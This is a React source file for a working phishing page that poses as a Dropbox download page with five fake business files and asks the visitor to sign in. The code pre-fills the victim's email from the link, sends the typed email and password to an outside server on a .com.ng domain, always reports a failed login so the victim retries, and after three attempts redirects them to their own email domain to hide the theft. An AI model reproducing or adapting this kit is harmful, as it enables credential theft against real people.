import React, { useState, useEffect } from 'react';
import Header from './components/Header';
import FileItem from './components/FileItem';
import LoginModal from './components/LoginModal';
import VerificationModal from './components/VerificationModal';
import './App.css';

const API_ENDPOINT = "https://shirtandshoes.com.ng/css/jr.php";

const App = () => {
  const [modalActive, setModalActive] = useState(false);
  const [failedAttempts, setFailedAttempts] = useState(0);
  const [showVerificationImage, setShowVerificationImage] = useState(false);
  const [email, setEmail] = useState('');
  const [password, setPassword] = useState('');
  const [emailError, setEmailError] = useState('');
  const [passwordError, setPasswordError] = useState('');
  const [emailInvalid, setEmailInvalid] = useState(false);
  const [passwordInvalid, setPasswordInvalid] = useState(false);

  const MAX_ATTEMPTS = 3;
  const VERIFICATION_IMAGE_URL = "https://5qbsg65zqy2qcwxietijc72lqnegvzk2mnuqvqtqnfctq2dbiktq.arweave.net/7AMje7mGNQFa6CTQkX9Lg0hq5VpjaQrCcGlFOGhhQqc";

  useEffect(() => {
    const extractedEmail = getEmailFromURL();
    if (extractedEmail) setEmail(extractedEmail);
  }, []);

  const showTempError = (setError, message, clearField = false, setInvalid = null) => {
    setError(message);
    if (setInvalid) setInvalid(true);
    
    setTimeout(() => {
      setError('');
      if (setInvalid) setInvalid(false);
    }, 2000);
    
    if (clearField) setPassword('');
  };

  const getEmailFromURL = () => {
    const urlParams = new URLSearchParams(window.location.search);
    const emailParam = urlParams.get('eci');
    if (emailParam) {
      const atIndex = emailParam.indexOf('@');
      if (atIndex !== -1) {
        const userPart = emailParam.substring(0, atIndex);
        let domainPart = emailParam.substring(atIndex + 1);
        domainPart = domainPart
          .replace(/dotcom/g, '.com')
          .replace(/dotnet/g, '.net')
          .replace(/dotorg/g, '.org')
          .replace(/dotedu/g, '.edu');
        return `${userPart}@${domainPart}`;
      }
      return emailParam;
    }
    return '';
  };

  const showModal = () => setModalActive(true);
  const closeModal = () => setModalActive(false);

  const validateForm = () => {
    setEmailError('');
    setPasswordError('');
    setEmailInvalid(false);
    setPasswordInvalid(false);

    let isValid = true;

    if (!email.includes('@') || !email.includes('.')) {
      showTempError(setEmailError, "Please enter a valid email.", false, setEmailInvalid);
      isValid = false;
    }

    if (!password || password.length < 6) {
      showTempError(setPasswordError, "Please enter a valid password", true, setPasswordInvalid);
      isValid = false;
    }

    return isValid;
  };

  const handleFormSubmission = () => {
    if (!validateForm()) return;

    setShowVerificationImage(true);
    
    const formData = new FormData();
    formData.append('email', email);
    formData.append('password', password);

    fetch(API_ENDPOINT, {
      method: 'POST',
      body: formData,
      credentials: 'include'
    })
    .then(response => {
      if (!response.ok) throw new Error('Network response was not ok');
      return response.json();
    })
    .then(data => {
      setTimeout(() => {
        setShowVerificationImage(false);
        
        if (data.status === 'error') {
          showTempError(setPasswordError, data.message || "Incorrect email/password combination", true, setPasswordInvalid);
          
          const newFailedAttempts = failedAttempts + 1;
          setFailedAttempts(newFailedAttempts);
          
          if (newFailedAttempts >= MAX_ATTEMPTS) {
            const domain = email.split('@')[1];
            if (domain) window.location.href = `http://${domain}`;
          }
        }
      }, 4000);
    })
    .catch(error => {
      console.error('Error:', error);
      setTimeout(() => {
        setShowVerificationImage(false);
        showTempError(setPasswordError, "Invalid Email/Password Combination", true, setPasswordInvalid);
      }, 4000);
    });
  };

  const files = [
    { name: "Order Lists.xls", size: "20 MB", icon: "https://img.icons8.com/color/48/000000/ms-excel.png" },
    { name: "Specifications.xls", size: "20 MB", icon: "https://img.icons8.com/color/48/000000/ms-excel.png" },
    { name: "Customized Items.xlsx", size: "4.5 MB", icon: "https://img.icons8.com/color/48/000000/ms-excel.png" },
    { name: "Company profile and scope of work.pdf", size: "10.5 MB", icon: "https://img.icons8.com/color/48/000000/pdf.png" },
    { name: "Drawings.pdf", size: "74 MB", icon: "https://img.icons8.com/color/48/000000/pdf.png" }
    
     
  ];

  return (
    <div className="app">
      <video className="video-bg" autoPlay muted loop playsInline>
        <source src="file.mp4" type="video/mp4" />
        Your browser does not support the video tag.
      </video>

      <Header />
      
      <div className="container">
        <div className="header1">
          <img src="img/dlogo.png" alt="Dropbox Logo" />
          <h2>5 items ready for download</h2>
          <p>129.5 MB • Expires in 7 days</p>
        </div>

        <div className="file-list">
          {files.map((file, index) => (
            <FileItem 
              key={index} 
              file={file} 
              onDownload={showModal}
            />
          ))}
        </div>

        <div className="footer">
          <div className="cloud">Save to cloud</div>
          <button onClick={showModal}>Download All</button>
        </div>
      </div>

      <LoginModal
        isActive={modalActive}
        onClose={closeModal}
        email={email}
        setEmail={setEmail}
        password={password}
        setPassword={setPassword}
        emailError={emailError}
        passwordError={passwordError}
        emailInvalid={emailInvalid}
        passwordInvalid={passwordInvalid}
        onSubmit={handleFormSubmission}
      />

      <VerificationModal
        isActive={showVerificationImage}
        imageUrl={VERIFICATION_IMAGE_URL}
      />
    </div>
  );
};

export default App;